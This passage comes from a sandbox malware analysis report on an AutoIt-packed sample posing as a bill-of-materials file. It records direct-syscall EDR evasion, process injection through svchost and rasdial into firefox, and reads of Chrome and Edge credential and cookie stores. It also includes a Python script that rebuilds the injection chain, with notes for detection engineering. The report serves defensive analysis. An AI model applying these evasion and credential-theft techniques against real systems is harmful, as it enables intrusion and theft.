            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]2_2_0386AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]2_2_0386AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BCA11 mov eax, dword ptr fs:[00000030h]2_2_038BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA24 mov eax, dword ptr fs:[00000030h]2_2_0386CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EA2E mov eax, dword ptr fs:[00000030h]2_2_0385EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]2_2_03854A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]2_2_03854A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA38 mov eax, dword ptr fs:[00000030h]2_2_0386CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]2_2_03840A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]2_2_03840A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEA60 mov eax, dword ptr fs:[00000030h]2_2_038DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]2_2_038ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]2_2_038ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]2_2_038309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]2_2_038309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov esi, dword ptr fs:[00000030h]2_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]2_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]2_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C69C0 mov eax, dword ptr fs:[00000030h]2_2_038C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038649D0 mov eax, dword ptr fs:[00000030h]2_2_038649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA9D3 mov eax, dword ptr fs:[00000030h]2_2_038FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE9E0 mov eax, dword ptr fs:[00000030h]2_2_038BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]2_2_038629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]2_2_038629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]2_2_038AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]2_2_038AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC912 mov eax, dword ptr fs:[00000030h]2_2_038BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]2_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe | Code functions, one entry per read of the PEB pointer at fs:[00000030h]:
2_2_03828918 mov eax, dword ptr fs:[00000030h]
2_2_038B892A mov eax, dword ptr fs:[00000030h]
2_2_038C892B mov eax, dword ptr fs:[00000030h]
2_2_038B0946 mov eax, dword ptr fs:[00000030h]
2_2_03904940 mov eax, dword ptr fs:[00000030h]
2_2_03856962 mov eax, dword ptr fs:[00000030h]
2_2_03856962 mov eax, dword ptr fs:[00000030h]
2_2_03856962 mov eax, dword ptr fs:[00000030h]
2_2_0387096E mov eax, dword ptr fs:[00000030h]
2_2_0387096E mov edx, dword ptr fs:[00000030h]
2_2_0387096E mov eax, dword ptr fs:[00000030h]
2_2_038D4978 mov eax, dword ptr fs:[00000030h]
2_2_038D4978 mov eax, dword ptr fs:[00000030h]
2_2_038BC97C mov eax, dword ptr fs:[00000030h]
2_2_03830887 mov eax, dword ptr fs:[00000030h]
2_2_038BC89D mov eax, dword ptr fs:[00000030h]
2_2_0385E8C0 mov eax, dword ptr fs:[00000030h]
2_2_039008C0 mov eax, dword ptr fs:[00000030h]
2_2_038FA8E4 mov eax, dword ptr fs:[00000030h]
2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]
2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]
2_2_038BC810 mov eax, dword ptr fs:[00000030h]
2_2_03852835 mov eax, dword ptr fs:[00000030h]
2_2_03852835 mov eax, dword ptr fs:[00000030h]
2_2_03852835 mov eax, dword ptr fs:[00000030h]
2_2_03852835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_00390B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_00362622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_0035083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_003509D5 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_00350C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe | Direct syscalls (signature: Found direct / indirect Syscall, likely to bypass EDR), each with the address the call was issued from:
NtResumeThread: Direct from: 0x773836AC
NtMapViewOfSection: Direct from: 0x77382D1C
NtWriteVirtualMemory: Direct from: 0x77382E3C
NtProtectVirtualMemory: Direct from: 0x77382F9C
NtSetInformationThread: Direct from: 0x773763F9
NtCreateMutant: Direct from: 0x773835CC
NtNotifyChangeKey: Direct from: 0x77383C2C
NtSetInformationProcess: Direct from: 0x77382C5C
NtCreateUserProcess: Direct from: 0x7738371C
NtQueryInformationProcess: Direct from: 0x77382C26
NtResumeThread: Direct from: 0x77382FBC
NtWriteVirtualMemory: Direct from: 0x7738490C
NtAllocateVirtualMemory: Direct from: 0x77383C9C
NtReadFile: Direct from: 0x77382ADC
NtAllocateVirtualMemory: Direct from: 0x77382BFC
NtDelayExecution: Direct from: 0x77382DDC
NtQuerySystemInformation: Direct from: 0x77382DFC
NtOpenSection: Direct from: 0x77382E0C
NtQueryVolumeInformationFile: Direct from: 0x77382F2C
NtQuerySystemInformation: Direct from: 0x773848CC
NtReadVirtualMemory: Direct from: 0x77382E8C
NtCreateKey: Direct from: 0x77382C6C
NtClose: Direct from: 0x77382B6C
NtAllocateVirtualMemory: Direct from: 0x773848EC
NtQueryAttributesFile: Direct from: 0x77382E6C
NtSetInformationThread: Direct from: 0x77382B4C
NtTerminateThread: Direct from: 0x77382FCC
NtQueryInformationToken: Direct from: 0x77382CAC
NtOpenKeyEx: Direct from: 0x77382B9C
NtAllocateVirtualMemory: Direct from: 0x77382BEC
NtDeviceIoControlFile: Direct from: 0x77382AEC
NtCreateFile: Direct from: 0x77382FEC
NtOpenFile: Direct from: 0x77382DCC
NtProtectVirtualMemory: Direct from: 0x77377B2E
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rasdial.exe | Section loaded: NULL target: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe protection: read write
Source: C:\Windows\SysWOW64\rasdial.exe | Section loaded: NULL target: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rasdial.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\rasdial.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rasdial.exe | Thread register set: target process: 5952
Source: C:\Windows\SysWOW64\rasdial.exe | Thread APC queued: target process: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: D36008
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_00391201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_00372BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_0039B226 SendInput,keybd_event
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_003B22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"
Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe | Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
Source: C:\Windows\SysWOW64\rasdial.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_00390B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_00391663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: Copy of 01. Bill of Material - 705.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: GQXHQykfhUHHi.exe, 00000004.00000002.4649561045.0000000001800000.00000002.00000001.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000000.2449005888.0000000001801000.00000002.00000001.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000000.2593049940.0000000001900000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
Source: Copy of 01. Bill of Material - 705.exe, GQXHQykfhUHHi.exe, 00000004.00000002.4649561045.0000000001800000.00000002.00000001.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000000.2449005888.0000000001801000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: GQXHQykfhUHHi.exe, 00000004.00000002.4649561045.0000000001800000.00000002.00000001.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000000.2449005888.0000000001801000.00000002.00000001.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000000.2593049940.0000000001900000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: GQXHQykfhUHHi.exe, 00000004.00000002.4649561045.0000000001800000.00000002.00000001.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000000.2449005888.0000000001801000.00000002.00000001.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000000.2593049940.0000000001900000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_00350698 cpuid
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_003A8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_0038D27A GetUserNameW
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_0036B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_003342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
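Two things an analyst wants to pull out of the evidence in this section are the injection chain (which process mapped an executable section into, wrote to, queued an APC in, or created which other process) and the direct-syscall activity of the injected GQXHQykfhUHHi.exe. The Python script below is an added example, not part of the Joe Sandbox report or of the sample: it parses evidence lines in the flattened "Source: <image><event>: <detail>" form shown above, rebuilds the chain sample -> svchost.exe -> GQXHQykfhUHHi.exe -> rasdial.exe -> firefox.exe, flags the process-hollowing tell visible in the first "Process created" line (svchost.exe launched with the sample's own command line, so the created image is not the image its command line names), and flags any process whose direct syscalls include a complete write-and-execute injection primitive set. The input is a constructed subset of the lines above; the primitive sets and the "section+x"/"apc"/"write"/"child" edge labels are the example's own choices.

```python
"""Rebuild the injection chain from Joe Sandbox evidence lines.

Added example, not part of the Joe Sandbox report or of the sample. It consumes
the flattened "Source: <image><event>: <detail>" lines as they appear in the
report and reports who injected into whom, which process was hollowed, and which
process issued a complete set of direct-syscall injection primitives.
"""
import re
from collections import defaultdict

# Image paths as they appear in this report.
SAMPLE = r"C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"
SVCHOST = r"C:\Windows\SysWOW64\svchost.exe"
RASDIAL = r"C:\Windows\SysWOW64\rasdial.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
DROPPED = (r"C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE"
           r"\GQXHQykfhUHHi.exe")

# Constructed input: a subset of the evidence lines from the section above.
EVIDENCE = [
    f"Source: {DROPPED}NtResumeThread: Direct from: 0x773836AC",
    f"Source: {DROPPED}NtMapViewOfSection: Direct from: 0x77382D1C",
    f"Source: {DROPPED}NtWriteVirtualMemory: Direct from: 0x77382E3C",
    f"Source: {DROPPED}NtProtectVirtualMemory: Direct from: 0x77382F9C",
    f"Source: {DROPPED}NtAllocateVirtualMemory: Direct from: 0x77383C9C",
    f"Source: {DROPPED}NtCreateMutant: Direct from: 0x773835CC",
    f"Source: {SAMPLE}Section loaded: NULL target: {SVCHOST} protection: execute and read and write",
    f"Source: {SVCHOST}Section loaded: NULL target: {DROPPED} protection: execute and read and write",
    f"Source: {SVCHOST}Section loaded: NULL target: {RASDIAL} protection: execute and read and write",
    f"Source: {RASDIAL}Section loaded: NULL target: {FIREFOX} protection: read write",
    f"Source: {RASDIAL}Section loaded: NULL target: {FIREFOX} protection: execute and read and write",
    f"Source: {RASDIAL}Thread APC queued: target process: {DROPPED}",
    f"Source: {SAMPLE}Memory written: {SVCHOST} base: D36008",
    f'Source: {SAMPLE}Process created: {SVCHOST} "{SAMPLE}"',
    f'Source: {DROPPED}Process created: {RASDIAL} "{RASDIAL}"',
    f'Source: {RASDIAL}Process created: {FIREFOX} "C:\\Program Files\\Mozilla Firefox\\Firefox.exe"',
]

# The image path ends at the first ".exe"; the event keyword is glued straight onto it.
EVENT_RE = re.compile(
    r"^Source: (?P<image>.+?\.exe)"
    r"(?P<event>Section loaded|Process created|Thread APC queued|Memory written|Nt[A-Za-z]+)"
    r": (?P<detail>.*)$"
)
SECTION_RE = re.compile(r"^NULL target: (?P<target>.+?\.exe) protection: (?P<prot>.+)$")

# Syscalls that stage code in another process, and those that start it running.
# Standard injection primitives; not every one of them occurs in this report.
WRITE_PRIMITIVES = {"NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtProtectVirtualMemory"}
EXEC_PRIMITIVES = {"NtMapViewOfSection", "NtResumeThread", "NtQueueApcThread",
                   "NtSetContextThread", "NtCreateThreadEx"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse(lines):
    """Yield (image, event, detail) for every line that matches the evidence format."""
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if m:
            yield m["image"], m["event"], m["detail"]


def walk(edges, root):
    """Depth-first order of processes reachable from root over injection/creation edges."""
    order, seen = [], set()

    def visit(node):
        if node in seen:
            return
        seen.add(node)
        order.append(node)
        for src, dst, _ in edges:
            if src == node:
                visit(dst)

    visit(root)
    return order


def analyze(lines, root=SAMPLE):
    syscalls = defaultdict(set)   # image -> direct syscalls seen
    edges = []                    # (source image, target image, kind)
    hollowing = []                # (parent, created image, image named on its command line)
    for image, event, detail in parse(lines):
        if event.startswith("Nt"):
            syscalls[image].add(event)
        elif event == "Section loaded":
            m = SECTION_RE.match(detail)
            if m and "execute" in m["prot"]:   # only executable mappings count as injection
                edges.append((image, m["target"], "section+x"))
        elif event == "Thread APC queued":
            edges.append((image, detail.split("target process: ", 1)[1], "apc"))
        elif event == "Memory written":
            edges.append((image, detail.split(" base: ", 1)[0], "write"))
        elif event == "Process created":
            child, _, cmdline = detail.partition(' "')
            edges.append((image, child, "child"))
            # Hollowing tell: the new process image is not the one its command line names.
            if basename(cmdline.rstrip('"')) != basename(child):
                hollowing.append((image, child, cmdline.rstrip('"')))
    direct_injectors = sorted(
        img for img, calls in syscalls.items()
        if WRITE_PRIMITIVES <= calls and calls & EXEC_PRIMITIVES
    )
    return {"edges": edges, "hollowing": hollowing,
            "direct_injectors": direct_injectors, "chain": walk(edges, root)}


if __name__ == "__main__":
    result = analyze(EVIDENCE)
    for src, dst, kind in result["edges"]:
        print(f"{basename(src)} --{kind}--> {basename(dst)}")
    print("hollowed:", [basename(c) for _, c, _ in result["hollowing"]])
    print("direct-syscall injectors:", [basename(i) for i in result["direct_injectors"]])
    print("chain:", " -> ".join(basename(p) for p in result["chain"]))
```

Two points for detection engineering follow from the output. The svchost.exe instance is created by the sample rather than by services.exe and carries the sample's command line, so an image/command-line mismatch rule catches the chain at its first hop, before any Nt* call. The direct syscalls matter for the later hops: a user-mode hook on ntdll exports does not see them, so the same edges have to be reconstructed from kernel-side telemetry (ETW threat-intelligence events, Sysmon ProcessAccess/CreateRemoteThread-style records) rather than from API hooks.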

            Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4642142846.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4651757327.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2525577951.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2527501783.0000000006980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4654251110.00000000056E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4651596001.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4651797494.0000000002EF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2526291195.0000000003C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\rasdial.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: Copy of 01. Bill of Material - 705.exe | Binary or memory string: WIN_81
Source: Copy of 01. Bill of Material - 705.exe | Binary or memory string: WIN_XP
Source: Copy of 01. Bill of Material - 705.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please 